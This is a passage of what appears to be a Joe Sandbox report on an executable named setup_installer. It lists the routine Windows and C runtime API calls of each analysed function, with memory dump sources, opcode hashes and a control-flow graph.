                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowfree
                                        • String ID:
                                        • API String ID: 1371406966-0
                                        • Opcode ID: ec4d247574fff5ead4947f581fa00135c9d74d8b5b33173528e34598dd795744
                                        • Instruction ID: 3991b56aa772d61d3444a8cef0fd9670766af5abd261621a3301c4c09fd1f304
                                        • Opcode Fuzzy Hash: ec4d247574fff5ead4947f581fa00135c9d74d8b5b33173528e34598dd795744
                                        • Instruction Fuzzy Hash: 11012175640204AAC725EF22C451BDEBFF4EF80314F00852FE892A32E1CB786A49CB48

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1499 405303-40532a SetFilePointer 1500 40533a-405358 call 4190a0 1499->1500 1501 40532c-405334 GetLastError 1499->1501 1504 40535a-40535c 1500->1504 1501->1500 1502 405336-405338 1501->1502 1502->1504
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040531F
                                        • GetLastError.KERNEL32(?,?,?,?), ref: 0040532C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: e5f51623b6d1066f15c38e0f7a766acb83092e1d779a669a0f1b84784c969e98
                                        • Instruction ID: 9124dc6d7053f8d6efb0d5dd32d4d25d1ca9512a9ee8f9f64a9de147337f6b78
                                        • Opcode Fuzzy Hash: e5f51623b6d1066f15c38e0f7a766acb83092e1d779a669a0f1b84784c969e98
                                        • Instruction Fuzzy Hash: 11F04971600208ABCB11DF69DC05BDB3BE5EB49354F108165F915E72A0E6759D10AAA4
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00410B26
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 00410B65
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ExceptionH_prologThrow
                                        • String ID:
                                        • API String ID: 461045715-0
                                        • Opcode ID: 8af01c6eb10b9063be972fec532e90461c8519683e3f33f3519498f04b14a68e
                                        • Instruction ID: 66cfeec8bba6f5a58313027dc29a8bde198ffc6f74079f781ea7209b80be1e28
                                        • Opcode Fuzzy Hash: 8af01c6eb10b9063be972fec532e90461c8519683e3f33f3519498f04b14a68e
                                        • Instruction Fuzzy Hash: 86F0FC71548344AEDB11DB98C4457EEBBA4EB55318F04405FF0449B241C7FCB9C487A9
                                        APIs
                                        • _beginthreadex.MSVCRT ref: 00418A94
                                        • GetLastError.KERNEL32(?,?,75C50B80,00000000,00000000), ref: 00418AA9
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ErrorLast_beginthreadex
                                        • String ID:
                                        • API String ID: 4034172046-0
                                        • Opcode ID: c548e9af719ead334f14ed1d54a67b1793e344066bbd5669ca46e26d0f3a0ecb
                                        • Instruction ID: 70daae52a94726005310dc0db4673b1cb6198bfb299c528c22bbb718e3dc4f27
                                        • Opcode Fuzzy Hash: c548e9af719ead334f14ed1d54a67b1793e344066bbd5669ca46e26d0f3a0ecb
                                        • Instruction Fuzzy Hash: D2E0E6B12052026FE3109B64DC15FA77698EF94781F44847EB545D6280EB749850C7B9
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,004025E4,?,00000000,?,00000000,?,?,75C50B80,00000000,00000000), ref: 00418A4A
                                        • GetLastError.KERNEL32(?,75C50B80,00000000,00000000), ref: 00418A54
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ChangeCloseErrorFindLastNotification
                                        • String ID:
                                        • API String ID: 1687624791-0
                                        • Opcode ID: 0433229ef2530785905c04bfe02dbd6fb0e4ed519826bd7185666009005914ad
                                        • Instruction ID: 7535ee298610e88dfaab19b27145df70c5ba92bd44e4c2e9d74370dd166c20af
                                        • Opcode Fuzzy Hash: 0433229ef2530785905c04bfe02dbd6fb0e4ed519826bd7185666009005914ad
                                        • Instruction Fuzzy Hash: EDD09E316141118FEB705F79BC087D726D8AF04791F15846FB450C2344EF68CDC146A8
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,00405FF7), ref: 00405FDB
                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 00405FE2
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        • Opcode ID: 07db69285f0a9f4bd27611239e22615ac5e837d892164ec821e022bab2d23e48
                                        • Instruction ID: 732ff7f231baee20a9cffd8d9fa0ed88e0eff740d633cb47fb09654a2f39704a
                                        • Opcode Fuzzy Hash: 07db69285f0a9f4bd27611239e22615ac5e837d892164ec821e022bab2d23e48
                                        • Instruction Fuzzy Hash: 80B092B1400104ABCE009BA0DE0C86B3E2CEA0C2013048468B215C1012DB3AC0018BA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ExceptionThrowmalloc
                                        • String ID:
                                        • API String ID: 2436765578-0
                                        • Opcode ID: a06ede8ce10373c961941a0e1058ae9254320e152fb985f8e6ab7cb75a938dad
                                        • Instruction ID: 21ad3b6c62fa819954115c8b0a5ff63e7c490964cbfc0d860bfe7ccd9a4adc8e
                                        • Opcode Fuzzy Hash: a06ede8ce10373c961941a0e1058ae9254320e152fb985f8e6ab7cb75a938dad
                                        • Instruction Fuzzy Hash: D9D0A73114434C7ACF016FE19C059CA3F5C9901671B00D46BF8588E116D634D3844758
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: bab2c70395a9ac63ff2a1e6cf90ccf3ca4ad1d567fbb6c2056be4227cc6cc286
                                        • Instruction ID: f668b284c9a992d87cd6d5ed2065a62fb7c1b42155693d61c0c1031baec4afb4
                                        • Opcode Fuzzy Hash: bab2c70395a9ac63ff2a1e6cf90ccf3ca4ad1d567fbb6c2056be4227cc6cc286
                                        • Instruction Fuzzy Hash: 9F327F70E04249DFDF11CFE8C984BAEBBB5AF49304F1440AAE845A7391C779AE49CB15
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 03cf4591cf909b2d04c6413f81e879f8fbbf87ed20dd82c53fd02e17f46b7009
                                        • Instruction ID: 25566729ef2c52a6845be5edffbec3a608f7ce3cf95c208b8dc0a298da87cac0
                                        • Opcode Fuzzy Hash: 03cf4591cf909b2d04c6413f81e879f8fbbf87ed20dd82c53fd02e17f46b7009
                                        • Instruction Fuzzy Hash: 24128E71900209DFCF10DFA4C888ADEBBB5AF48314F2485AAE459BB2D1D738AE45CF55
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00401F2B
                                          • Part of subcall function 004023F0: EnterCriticalSection.KERNEL32(?,?,?,0040B84D), ref: 004023F5
                                          • Part of subcall function 004023F0: LeaveCriticalSection.KERNEL32(?,?,?,?,0040B84D), ref: 004023FF
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterH_prologLeave
                                        • String ID:
                                        • API String ID: 367238759-0
                                        • Opcode ID: 220cea634fa4220f2899e35a25b328741d65bd45df79bc03c8ba1a60db2c5a6d
                                        • Instruction ID: 9aea0566c9c0e61cfee338e95f65c5ac720cc4bbfeed0489b5d27597e260e310
                                        • Opcode Fuzzy Hash: 220cea634fa4220f2899e35a25b328741d65bd45df79bc03c8ba1a60db2c5a6d
                                        • Instruction Fuzzy Hash: 62D19E7090020ADFCF10EFA5C9849EEBBB5AF54308F14846FE506B72D1DB786A46CB19
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040A2CD
                                          • Part of subcall function 00409DAD: __EH_prolog.LIBCMT ref: 00409DB2
                                          • Part of subcall function 00408FCD: __EH_prolog.LIBCMT ref: 00408FD2
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        • Opcode ID: 55abee7260f8abe240855f7b25643b941ebcc1b184b95c31af575d9cb9fe0adf
                                        • Instruction ID: 9e12673def2b6459cc981bd691141fc0cb4a79b6ab5f4124fe6ffa379ca14ef1
                                        • Opcode Fuzzy Hash: 55abee7260f8abe240855f7b25643b941ebcc1b184b95c31af575d9cb9fe0adf
                                        • Instruction Fuzzy Hash: 6A618375600205AFCB20EF61C885EAEBBB8EF44308F10447FE545B72D1DAB8AD55CB55
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040AFAC
                                          • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                          • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                          • Part of subcall function 0040B121: __EH_prolog.LIBCMT ref: 0040B126
                                          • Part of subcall function 00403089: __EH_prolog.LIBCMT ref: 0040308E
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowfreemalloc
                                        • String ID:
                                        • API String ID: 2423332413-0
                                        • Opcode ID: c8c338b597bb87f34b6799d60552420470ea2ee0c89de6097328a63dfc2d9501
                                        • Instruction ID: f9ed70e7a4a1b4ee0be54417d9786138a5d8b1a5d5847858de7e9c53087b4eef
                                        • Opcode Fuzzy Hash: c8c338b597bb87f34b6799d60552420470ea2ee0c89de6097328a63dfc2d9501
                                        • Instruction Fuzzy Hash: AB518371900609DFCB15EFA5C484A9EFBB4FF04314F10856FE565A72D2CB389A45CB98
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 688431a7679907d68e44e8c85a409a014ac76cdf269a26074d0c41ebe40ab3a9
                                        • Instruction ID: 4a5508fcdcfeb9f530550f46dd1ec58a167ca447d216ffc80f9ca1221c3f6995
                                        • Opcode Fuzzy Hash: 688431a7679907d68e44e8c85a409a014ac76cdf269a26074d0c41ebe40ab3a9
                                        • Instruction Fuzzy Hash: 3B418D70A00345EFDB24CF94C484B6ABBA1BF45310F1486BED496AB691C778ED89CB84
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 004024E0
                                          • Part of subcall function 004029F9: __EH_prolog.LIBCMT ref: 004029FE
                                          • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                          • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                          • Part of subcall function 00402BC1: __EH_prolog.LIBCMT ref: 00402BC6
                                          • Part of subcall function 0040264D: SetWindowTextW.USER32(?,00000000), ref: 0040268C
                                          • Part of subcall function 0040264D: ShowWindow.USER32(?,00000001,?,00000000,75C50B80,00000000,00000000), ref: 004026A0
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                          • Part of subcall function 00418A40: FindCloseChangeNotification.KERNELBASE(00000000,00000000,004025E4,?,00000000,?,00000000,?,?,75C50B80,00000000,00000000), ref: 00418A4A
                                          • Part of subcall function 00418A40: GetLastError.KERNEL32(?,75C50B80,00000000,00000000), ref: 00418A54
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$Window$ChangeCloseErrorExceptionFindLastNotificationShowTextThrowfreemalloc
                                        • String ID:
                                        • API String ID: 2108476524-0
                                        • Opcode ID: ac195c0b695798d9808fac272235901bdee3c4edab07ab49ca39f86af56bbdc0
                                        • Instruction ID: e4ab0e75387cb74cbe1b5fc93c7fe6c9256d258209eed3f76a342f3f4d07c0fd
                                        • Opcode Fuzzy Hash: ac195c0b695798d9808fac272235901bdee3c4edab07ab49ca39f86af56bbdc0
                                        • Instruction Fuzzy Hash: 3F419D719002589BCB15EF65C995BEDBB74AF04318F0484AFE809B72C2DA785F45CB19
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040E525
                                          • Part of subcall function 00410B21: __EH_prolog.LIBCMT ref: 00410B26
                                          • Part of subcall function 00410B21: _CxxThrowException.MSVCRT(?,0041DE18), ref: 00410B65
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrow
                                        • String ID:
                                        • API String ID: 2366012087-0
                                        • Opcode ID: 90830b7693d5648a5944311c11a3abd2fc51c06453079e5404b3f0681c69fa04
                                        • Instruction ID: 710ff75e20c748aeae2c70901895ef3fcc3945575a6bdc354df96893f0d3ab55
                                        • Opcode Fuzzy Hash: 90830b7693d5648a5944311c11a3abd2fc51c06453079e5404b3f0681c69fa04
                                        • Instruction Fuzzy Hash: E8419130900149DFDB11CFA9C988B9DBBF4AF15308F5848AEE409A7382D779DE95CB21
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 436dc630c05416e3cf5621d242d1c01c60a5c85469768495bcdd115d46ddbd38
                                        • Instruction ID: 4e51b77cf272770328ea170ef20ccabb87444c61482e249fd0a56672ac917635
                                        • Opcode Fuzzy Hash: 436dc630c05416e3cf5621d242d1c01c60a5c85469768495bcdd115d46ddbd38
                                        • Instruction Fuzzy Hash: C3314172D00209DBCB10EFA5D451ADEBBB8AF14315F14457EE852732D2DB386A49CB64
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00404A45
                                          • Part of subcall function 004048D6: GetTempPathW.KERNEL32(00000105,00000000,?,00000000), ref: 00404901
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prologPathTemp
                                        • String ID:
                                        • API String ID: 2295663095-0
                                        • Opcode ID: a49cf9d5a64c2d9107d1a1b4841457935b9914ca147be5eea58a22da2a77a225
                                        • Instruction ID: 500e7c3c87435707449ca800f4b4260e57527cfcbd0d94049d93bf02f8690a9f
                                        • Opcode Fuzzy Hash: a49cf9d5a64c2d9107d1a1b4841457935b9914ca147be5eea58a22da2a77a225
                                        • Instruction Fuzzy Hash: 5201D2715801059ACF10EF65DA12BDDBBA4AF65308F04406FEA41732D2DB3E0A48CB58
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040CF6C
                                          • Part of subcall function 0040D079: __EH_prolog.LIBCMT ref: 0040D07E
                                          • Part of subcall function 0040CE6F: __EH_prolog.LIBCMT ref: 0040CE74
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                          • Part of subcall function 0040CFE0: __EH_prolog.LIBCMT ref: 0040CFE5
                                          • Part of subcall function 0040D028: __EH_prolog.LIBCMT ref: 0040D02D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        • Opcode ID: c04d202dfaf42dce8f38389c920a9751c2b394dc520640e78194b7a5e7c61d27
                                        • Instruction ID: 790da130da96b865fcd1dde8fbfb491d557677c493d466ae6f611681a479457d
                                        • Opcode Fuzzy Hash: c04d202dfaf42dce8f38389c920a9751c2b394dc520640e78194b7a5e7c61d27
                                        • Instruction Fuzzy Hash: 26F0D671D14654DACB19EB69D41179DBBE09F0030CF10429EE052732C2CBBC1B048A4D
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040CF1B
                                          • Part of subcall function 0040CF67: __EH_prolog.LIBCMT ref: 0040CF6C
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        • Opcode ID: 728656c154c79e3640467da3d1dd369a93413695509cfd56ac0ae59aba9a333c
                                        • Instruction ID: 9ff98c2d2858f5676d26b2fcb0e5ae345ac01743015ec23c8b6fe664862117fb
                                        • Opcode Fuzzy Hash: 728656c154c79e3640467da3d1dd369a93413695509cfd56ac0ae59aba9a333c
                                        • Instruction Fuzzy Hash: 47F0E9325012129BD711AF0AD481B9EF7A9EF14724F04417FE101772C2CB789C008989
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 004051B3
                                          • Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
